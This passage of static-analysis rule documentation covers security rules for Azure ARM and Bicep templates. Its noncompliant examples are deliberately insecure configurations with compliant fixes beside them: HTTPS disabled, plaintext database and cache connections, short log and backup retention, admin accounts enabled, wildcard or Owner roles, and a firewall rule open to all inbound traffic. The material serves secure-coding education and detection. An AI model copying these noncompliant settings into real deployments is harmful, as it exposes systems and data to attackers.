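        {"type": "Microsoft.Storage/storageAccounts",
         "properties": {"supportsHttpsTrafficOnly": True}},
    ]
}
print(find_cleartext_issues(template))  # only the web app is flagged
```

A real analyzer also has to resolve ARM template expressions and parameter defaults; this sketch only illustrates the property checks.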

Sensitive Code Example

For Microsoft.Web/sites:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-09-01",
      "properties": {
        "httpsOnly": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites@2022-09-01' = {
  properties: {
    httpsOnly: false // Sensitive
  }
}

For Microsoft.Web/sites/config:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-09-01",
      "properties": {
        "ftpsState": "AllAllowed"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites/config@2022-09-01' = {
  properties: {
    ftpsState: 'AllAllowed' // Sensitive
  }
}

For Microsoft.Storage/storageAccounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "supportsHttpsTrafficOnly": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  properties: {
    supportsHttpsTrafficOnly: false // Sensitive
  }
}

For Microsoft.ApiManagement/service/apis:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ApiManagement/service/apis",
      "apiVersion": "2022-08-01",
      "properties": {
        "protocols": ["http"]
      }
    }
  ]
}
resource symbolicname 'Microsoft.ApiManagement/service/apis@2022-08-01' = {
  properties: {
    protocols: ['http'] // Sensitive
  }
}

For Microsoft.Cdn/profiles/endpoints:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cdn/profiles/endpoints",
      "apiVersion": "2021-06-01",
      "properties": {
        "isHttpAllowed": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cdn/profiles/endpoints@2021-06-01' = {
  properties: {
    isHttpAllowed: true // Sensitive
  }
}

For Microsoft.Cache/redisEnterprise/databases:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cache/redisEnterprise/databases",
      "apiVersion": "2022-01-01",
      "properties": {
        "clientProtocol": "Plaintext"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cache/redisEnterprise/databases@2022-01-01' = {
  properties: {
    clientProtocol: "Plaintext" // Sensitive
  }
}

For Microsoft.DBforMySQL/servers, Microsoft.DBforMariaDB/servers, and Microsoft.DBforPostgreSQL/servers:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "sslEnforcement": "Disabled"
      }
    }
  ]
}
resource symbolicname 'Microsoft.DBforMySQL/servers@2017-12-01' = {
  properties: {
    sslEnforcement: "Disabled" // Sensitive
  }
}

Compliant Solution

For Microsoft.Web/sites:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-09-01",
      "properties": {
        "httpsOnly": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites@2022-09-01' = {
  properties: {
    httpsOnly: true
  }
}

For Microsoft.Web/sites/config:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-09-01",
      "properties": {
        "ftpsState": "FtpsOnly"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites/config@2022-09-01' = {
  properties: {
    ftpsState: 'FtpsOnly'
  }
}

For Microsoft.Storage/storageAccounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "supportsHttpsTrafficOnly": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  properties: {
    supportsHttpsTrafficOnly: true
  }
}

For Microsoft.ApiManagement/service/apis:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ApiManagement/service/apis",
      "apiVersion": "2022-08-01",
      "properties": {
        "protocols": ["https"]
      }
    }
  ]
}
resource symbolicname 'Microsoft.ApiManagement/service/apis@2022-08-01' = {
  properties: {
    protocols: ['https']
  }
}

For Microsoft.Cdn/profiles/endpoints:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cdn/profiles/endpoints",
      "apiVersion": "2021-06-01",
      "properties": {
        "isHttpAllowed": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cdn/profiles/endpoints@2021-06-01' = {
  properties: {
    isHttpAllowed: false
  }
}

For Microsoft.Cache/redisEnterprise/databases:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cache/redisEnterprise/databases",
      "apiVersion": "2022-01-01",
      "properties": {
        "clientProtocol": "Encrypted"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cache/redisEnterprise/databases@2022-01-01' = {
  properties: {
    clientProtocol: "Encrypted"
  }
}

For Microsoft.DBforMySQL/servers, Microsoft.DBforMariaDB/servers, and Microsoft.DBforPostgreSQL/servers:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "sslEnforcement": "Enabled"
      }
    }
  ]
}
resource symbolicname 'Microsoft.DBforMySQL/servers@2017-12-01' = {
  properties: {
    sslEnforcement: "Enabled"
  }
}


azureresourcemanager:S6413

Defining a short log retention duration can reduce an organization’s ability to backtrace the actions of malicious actors in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require traceability for a longer duration.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Setting the log retention period to 14 days is the bare minimum. It is recommended to increase it to 30 days or more.

Sensitive Code Example

For Azure Firewall Policy:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/firewallPolicies",
      "apiVersion": "2022-07-01",
      "properties": {
        "insights": {
          "isEnabled": true,
          "retentionDays": 7
        }
      }
    }
  ]
}
resource firewallPolicy 'Microsoft.Network/firewallPolicies@2022-07-01' = {
  properties: {
    insights: {
      isEnabled: true
      retentionDays: 7  // Sensitive
    }
  }
}

An issue is raised when retentionDays is lower than 14 but not 0 (zero), when isEnabled is false, or when the insights block is missing.

For Microsoft Network Network Watchers Flow Logs:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/networkWatchers/flowLogs",
      "apiVersion": "2022-07-01",
      "properties": {
        "retentionPolicy": {
          "days": 7,
          "enabled": true
        }
      }
    }
  ]
}
resource networkWatchersFlowLogs 'Microsoft.Network/networkWatchers/flowLogs@2022-07-01' = {
  properties: {
    retentionPolicy: {
      days: 7       // Sensitive
      enabled: true
    }
  }
}

An issue is raised when days is lower than 14 but not 0 (zero), when enabled is set to false, or when the retentionPolicy block is missing.

For Microsoft SQL Servers Auditing Settings:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/auditingSettings",
      "apiVersion": "2021-11-01",
      "properties": {
        "retentionDays": 7
      }
    }
  ]
}
resource sqlServerAudit 'Microsoft.Sql/servers/auditingSettings@2021-11-01' = {
  properties: {
    retentionDays: 7    // Sensitive
  }
}

An issue is raised when retentionDays is lower than 14 but not 0 (zero).
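The threshold condition described above can be sketched as follows (a minimal Python illustration; the helper name is hypothetical and this is not SonarQube's actual rule implementation):

```python
def retention_is_sensitive(retention_days: int) -> bool:
    """True when a retention setting should be flagged by the rule."""
    # Values below 14 days are flagged, except 0, which the rule
    # excludes (in Azure, 0 commonly means unlimited retention).
    return retention_days != 0 and retention_days < 14

print(retention_is_sensitive(7))   # True: shorter than two weeks
print(retention_is_sensitive(0))   # False: excluded by the rule
print(retention_is_sensitive(30))  # False: meets the recommendation
```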

The same check applies to other resource types that expose equivalent retention settings.

Compliant Solution

For Azure Firewall Policy:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/firewallPolicies",
      "apiVersion": "2022-07-01",
      "properties": {
        "insights": {
          "isEnabled": true,
          "retentionDays": 30
        }
      }
    }
  ]
}
resource firewallPolicy 'Microsoft.Network/firewallPolicies@2022-07-01' = {
  properties: {
    insights: {
      isEnabled: true
      retentionDays: 30  // Compliant
    }
  }
}

For Microsoft Network Network Watchers Flow Logs:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/networkWatchers/flowLogs",
      "apiVersion": "2022-07-01",
      "properties": {
        "retentionPolicy": {
          "days": 30,
          "enabled": true
        }
      }
    }
  ]
}
resource networkWatchersFlowLogs 'Microsoft.Network/networkWatchers/flowLogs@2022-07-01' = {
  properties: {
    retentionPolicy: {
      days: 30      // Compliant
      enabled: true
    }
  }
}

For Microsoft SQL Servers Auditing Settings:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/auditingSettings",
      "apiVersion": "2021-11-01",
      "properties": {
        "retentionDays": 30
      }
    }
  ]
}
resource sqlServerAudit 'Microsoft.Sql/servers/auditingSettings@2021-11-01' = {
  properties: {
    retentionDays: 30    // Compliant
  }
}

The code above also applies to the other resource types mentioned in the previous paragraph.

azureresourcemanager:S6379

Enabling Azure resource-specific admin accounts can reduce an organization’s ability to protect itself against account or service account thefts.

Full Administrator permissions fail to correctly separate duties and create potentially critical attack vectors on the impacted resources.

In case of abuse of elevated permissions, both the data on which impacted resources operate and their access traceability are at risk.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require this resource to disable its administrative accounts or permissions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable the administrative accounts or permissions in this Azure resource.

Sensitive Code Example

For Azure Batch Pools:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Batch/batchAccounts/pools",
            "apiVersion": "2022-10-01",
            "properties": {
                "startTask": {
                    "userIdentity": {
                        "autoUser": {
                            "elevationLevel": "Admin"
                        }
                    }
                }
            }
        }
    ]
}
resource AdminBatchPool 'Microsoft.Batch/batchAccounts/pools@2022-10-01' = {
  properties: {
    startTask: {
      userIdentity: {
        autoUser: {
          elevationLevel: 'Admin' // Noncompliant
        }
      }
    }
  }
}

For Azure Container Registries:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ContainerRegistry/registries",
            "apiVersion": "2023-01-01-preview",
            "properties": {
                "adminUserEnabled": true
            }
        }
    ]
}
resource acrAdminUserDisabled 'Microsoft.ContainerRegistry/registries@2021-09-01' = {
  properties: {
    adminUserEnabled: true // Noncompliant
  }
}

Compliant Solution

For Azure Batch Pools:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Batch/batchAccounts/pools",
            "apiVersion": "2022-10-01",
            "properties": {
                "startTask": {
                    "userIdentity": {
                        "autoUser": {
                            "elevationLevel": "NonAdmin"
                        }
                    }
                }
            }
        }
    ]
}
resource AdminBatchPool 'Microsoft.Batch/batchAccounts/pools@2022-10-01' = {
  properties: {
    startTask: {
      userIdentity: {
        autoUser: {
          elevationLevel: 'NonAdmin' // Compliant
        }
      }
    }
  }
}

For Azure Container Registries:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ContainerRegistry/registries",
            "apiVersion": "2023-01-01-preview",
            "properties": {
                "adminUserEnabled": false
            }
        }
    ]
}
resource acrAdminUserDisabled 'Microsoft.ContainerRegistry/registries@2021-09-01' = {
  properties: {
    adminUserEnabled: false // Compliant
  }
}


azureresourcemanager:S6385

Why is this an issue?

Defining a custom role for a Subscription or a Management Group that allows all actions gives it the same capabilities as the built-in Owner role. It is recommended to limit the number of subscription owners in order to mitigate the risk of being breached through a compromised owner.

This rule raises an issue when a custom role has an assignable scope set to a Subscription or a Management Group and allows all actions (*).
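This condition can be sketched as follows (a minimal Python illustration under simplifying assumptions; the helper name and the substring-based scope matching are hypothetical, not the rule's actual implementation):

```python
def role_is_too_permissive(role_properties: dict) -> bool:
    """True when a role definition allows all actions on a wide scope."""
    allows_all_actions = any(
        "*" in permission.get("actions", [])
        for permission in role_properties.get("permissions", [])
    )
    # Simplistic scope matching for illustration: real scopes are ARM
    # expressions or resource IDs such as '[subscription().id]' or
    # '/providers/Microsoft.Management/managementGroups/...'.
    wide_scope = any(
        "subscription" in scope.lower() or "managementgroup" in scope.lower()
        for scope in role_properties.get("assignableScopes", [])
    )
    return allows_all_actions and wide_scope
```

Applied to the examples below, the role allowing `"actions": ["*"]` on `"[subscription().id]"` is flagged, while the role restricted to `"Microsoft.Compute/*"` is not.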

How to fix it

Code examples

Noncompliant code example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleDefinitions",
      "apiVersion": "2022-04-01",
      "properties": {
        "permissions": [
          {
            "actions": ["*"],
            "notActions": []
          }
        ],
        "assignableScopes": [
          "[subscription().id]"
        ]
      }
    }
  ]
}
targetScope = 'managementGroup'

resource roleDef 'Microsoft.Authorization/roleDefinitions@2022-04-01' = { // Sensitive
  properties: {
    permissions: [
      {
        actions: ['*']
        notActions: []
      }
    ]

    assignableScopes: [
      managementGroup().id
    ]
  }
}

Compliant solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleDefinitions",
      "apiVersion": "2022-04-01",
      "properties": {
        "permissions": [
          {
            "actions": ["Microsoft.Compute/*"],
            "notActions": []
          }
        ],
        "assignableScopes": [
          "[subscription().id]"
        ]
      }
    }
  ]
}
targetScope = 'managementGroup'

resource roleDef 'Microsoft.Authorization/roleDefinitions@2022-04-01' = {
  properties: {
    permissions: [
      {
        actions: ['Microsoft.Compute/*']
        notActions: []
      }
    ]

    assignableScopes: [
      managementGroup().id
    ]
  }
}

Going the extra mile

Here is a list of recommendations to follow regarding good usage of roles:

  • Apply the least privilege principle by creating a custom role with as few permissions as possible.
  • As custom roles can be updated, gradually add atomic permissions when required.
  • Limit the assignable scopes of the custom role to a set of Resources or Resource Groups.
  • When necessary, use the built-in Owner role instead of a custom role granting subscription owner capabilities.
  • Limit the assignments of Owner roles to less than three people or service principals.
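
Under these recommendations, a narrowly scoped custom role might look like the following Bicep sketch. The role name and permission set are illustrative assumptions, not part of the rule's examples:

```bicep
// Illustrative only: a custom role limited to read-only compute actions,
// assignable only within a single resource group.
targetScope = 'resourceGroup'

resource readOnlyComputeRole 'Microsoft.Authorization/roleDefinitions@2022-04-01' = {
  name: guid(resourceGroup().id, 'readOnlyComputeRole')
  properties: {
    roleName: 'Compute Reader (custom)'
    permissions: [
      {
        actions: ['Microsoft.Compute/*/read'] // atomic, read-only permissions
        notActions: []
      }
    ]
    assignableScopes: [
      resourceGroup().id // narrower than a Subscription or Management Group
    ]
  }
}
```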

Resources

Documentation

azureresourcemanager:S6387

Azure RBAC roles can be assigned to users, groups, or service principals. A role assignment grants permissions on a predefined set of resources called "scope".

The widest scopes a role can be assigned to are:

  • Subscription: a role assigned with this scope grants access to all resources of this Subscription.
  • Management Group: a role assigned with this scope grants access to all resources of all the Subscriptions in this Management Group.

In case of security incidents involving a compromised identity (user, group, or service principal), limiting its role assignment to the narrowest scope possible helps separate duties and limits what resources are at risk.

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of the resources in the scope to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split the scope into multiple role assignments with a narrower scope.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the scope of the role assignment to a Resource or Resource Group.
  • Apply the least privilege principle by assigning roles granting as few permissions as possible.

Sensitive Code Example

{
  "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "name": "[guid(subscription().id, 'exampleRoleAssignment')]"
    }
  ]
}

Compliant Solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "name": "[guid(resourceGroup().id, 'exampleRoleAssignment')]"
    }
  ]
}
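
Other rules in this report pair each JSON template with a Bicep example; a Bicep sketch of the same resource-group-scoped assignment might look like this (the principal and role IDs are illustrative placeholders):

```bicep
// Illustrative Bicep equivalent: the assignment name and scope are derived
// from the resource group of the deployment, not the whole Subscription.
resource exampleRoleAssignment 'Microsoft.Authorization/roleAssignments@2022-04-01' = {
  name: guid(resourceGroup().id, 'exampleRoleAssignment')
  properties: {
    principalId: 'string' // placeholder principal
    // built-in Reader role, as an example of a limited permission set
    roleDefinitionId: resourceId('Microsoft.Authorization/roleDefinitions', 'acdd72a7-3385-48ef-bd42-f606fba81ae7')
  }
}
```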

See

azureresourcemanager:S6321

Why is this an issue?

Cloud platforms such as Azure support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges, so a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Network/networkSecurityGroups/securityRules",
            "apiVersion": "2022-11-01",
            "properties": {
                "protocol": "*",
                "destinationPortRange": "*",
                "sourceAddressPrefix": "*",
                "access": "Allow",
                "direction": "Inbound"
            }
        }
    ]
}
resource securityRules 'Microsoft.Network/networkSecurityGroups/securityRules@2022-11-01' = {
  name: 'securityRules'
  properties: {
    direction: 'Inbound'
    access: 'Allow'
    protocol: '*'
    destinationPortRange: '*'
    sourceAddressPrefix: '*'
  }
}

Compliant solution

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Network/networkSecurityGroups/securityRules",
            "apiVersion": "2022-11-01",
            "properties": {
                "protocol": "*",
                "destinationPortRange": "22",
                "sourceAddressPrefix": "10.0.0.0/24",
                "access": "Allow",
                "direction": "Inbound"
            }
        }
    ]
}
resource securityRules 'Microsoft.Network/networkSecurityGroups/securityRules@2022-11-01' = {
  name: 'securityRules'
  properties: {
    direction: 'Inbound'
    access: 'Allow'
    protocol: '*'
    destinationPortRange: '22'
    sourceAddressPrefix: '10.0.0.0/24'
  }
}

Resources

Documentation

Standards

azureresourcemanager:S6364

Reducing the backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups make it possible to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient to restore service in case of an incident.

Sensitive Code Example

For Azure App Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-03-01",
      "name": "webApp",
    },
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-03-01",
      "name": "webApp/backup",
      "properties": {
        "backupSchedule": {
          "frequencyInterval": 1,
          "frequencyUnit": "Day",
          "keepAtLeastOneBackup": true,
          "retentionPeriodInDays": 2
        }
      },
      "dependsOn": [
        "[resourceId('Microsoft.Web/sites', 'webApp')]"
      ]
    }
  ]
}

For Azure Cosmos DB accounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/databaseAccounts",
      "apiVersion": "2023-04-15",
      "properties": {
        "backupPolicy": {
          "type": "Periodic",
          "periodicModeProperties": {
            "backupIntervalInMinutes": 1440,
            "backupRetentionIntervalInHours": 8
          }
        }
      }
    }
  ]
}

For Azure Backup vault policies:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "name": "testVault",
      "resources": [
        {
          "type": "backupPolicies",
          "apiVersion": "2023-01-01",
          "name": "testVault/backupPolicy",
          "properties": {
            "backupManagementType": "AzureSql",
            "retentionPolicy": {
              "retentionPolicyType": "SimpleRetentionPolicy",
              "retentionDuration": {
                "count": 2,
                "durationType": "Days"
              }
            }
          }
        }
      ]
    }
  ]
}

Compliant Solution

For Azure App Service:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-03-01",
      "name": "webApp",
    },
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-03-01",
      "name": "webApp/backup",
      "properties": {
        "backupSchedule": {
          "frequencyInterval": 1,
          "frequencyUnit": "Day",
          "keepAtLeastOneBackup": true,
          "retentionPeriodInDays": 15
        }
      },
      "dependsOn": [
        "[resourceId('Microsoft.Web/sites', 'webApp')]"
      ]
    }
  ]
}

For Azure Cosmos DB accounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/databaseAccounts",
      "apiVersion": "2023-04-15",
      "properties": {
        "backupPolicy": {
          "type": "Periodic",
          "periodicModeProperties": {
            "backupIntervalInMinutes": 1440,
            "backupRetentionIntervalInHours": 360
          }
        }
      }
    }
  ]
}

For Azure Backup vault policies:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "name": "testVault",
      "resources": [
        {
          "type": "backupPolicies",
          "apiVersion": "2023-01-01",
          "name": "testVault/backupPolicy",
          "properties": {
            "backupManagementType": "AzureSql",
            "retentionPolicy": {
              "retentionPolicyType": "SimpleRetentionPolicy",
              "retentionDuration": {
                "count": 8,
                "durationType": "Days"
              }
            }
          }
        }
      ]
    }
  ]
}
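
A Bicep sketch of the compliant Cosmos DB backup configuration above might look like the following. The account name is illustrative, and the required account properties (locations, offer type) are elided for brevity:

```bicep
// Illustrative: daily periodic backups retained for 15 days (360 hours).
resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-04-15' = {
  name: 'example'
  properties: {
    backupPolicy: {
      type: 'Periodic'
      periodicModeProperties: {
        backupIntervalInMinutes: 1440
        backupRetentionIntervalInHours: 360 // Compliant: two weeks of backups
      }
    }
  }
}
```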
azureresourcemanager:S6381

Azure Resource Manager offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c)
  • Owner (8e3af657-a8ff-443c-a75c-2fe8c4bcb635)
  • User Access Administrator (18d7d88d-d35e-4fb5-a5c3-7773c20a72d9)

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Owner roles to less than 3 people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.

Sensitive Code Example

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "properties": {
        "description": "Assign the contributor role",
        "principalId": "string",
        "principalType": "ServicePrincipal",
        "roleDefinitionId": "[resourceId('Microsoft.Authorization/roleDefinitions', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Authorization/roleAssignments@2022-04-01' = {
  scope: tenant()
  properties: {
    description: 'Assign the contributor role'
    principalId: 'string'
    principalType: 'ServicePrincipal'
    roleDefinitionId: resourceId('Microsoft.Authorization/roleDefinitions', 'b24988ac-6180-42a0-ab88-20f7382dd24c')
  }
}

Compliant Solution

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Authorization/roleAssignments",
      "apiVersion": "2022-04-01",
      "properties": {
        "description": "Assign the reader role",
        "principalId": "string",
        "principalType": "ServicePrincipal",
        "roleDefinitionId": "[resourceId('Microsoft.Authorization/roleDefinitions', 'acdd72a7-3385-48ef-bd42-f606fba81ae7')]"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Authorization/roleAssignments@2022-04-01' = {
  scope: tenant()
  properties: {
    description: 'Assign the reader role'
    principalId: 'string'
    principalType: 'ServicePrincipal'
    roleDefinitionId: resourceId('Microsoft.Authorization/roleDefinitions', 'acdd72a7-3385-48ef-bd42-f606fba81ae7')
  }
}

See

azureresourcemanager:S6380

Allowing anonymous access can reduce an organization’s ability to protect itself against attacks on its Azure resources.

Security incidents may include disrupting critical functions, data theft, and additional Azure subscription costs due to resource overload.

Using authentication coupled with fine-grained authorizations brings defense in depth and gives traceability to investigators of security incidents.

Depending on the affected Azure resource, multiple authentication choices are possible: Active Directory Authentication, OpenID implementations (Google, Microsoft, etc.) or native Azure mechanisms.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • This Azure resource stores or processes sensitive data.
  • Compliance policies require access to this resource to be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Enable authentication in this Azure resource, and disable anonymous access.

If only Basic Authentication is available, enable it.

Sensitive Code Example

For App Service:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Web/sites",
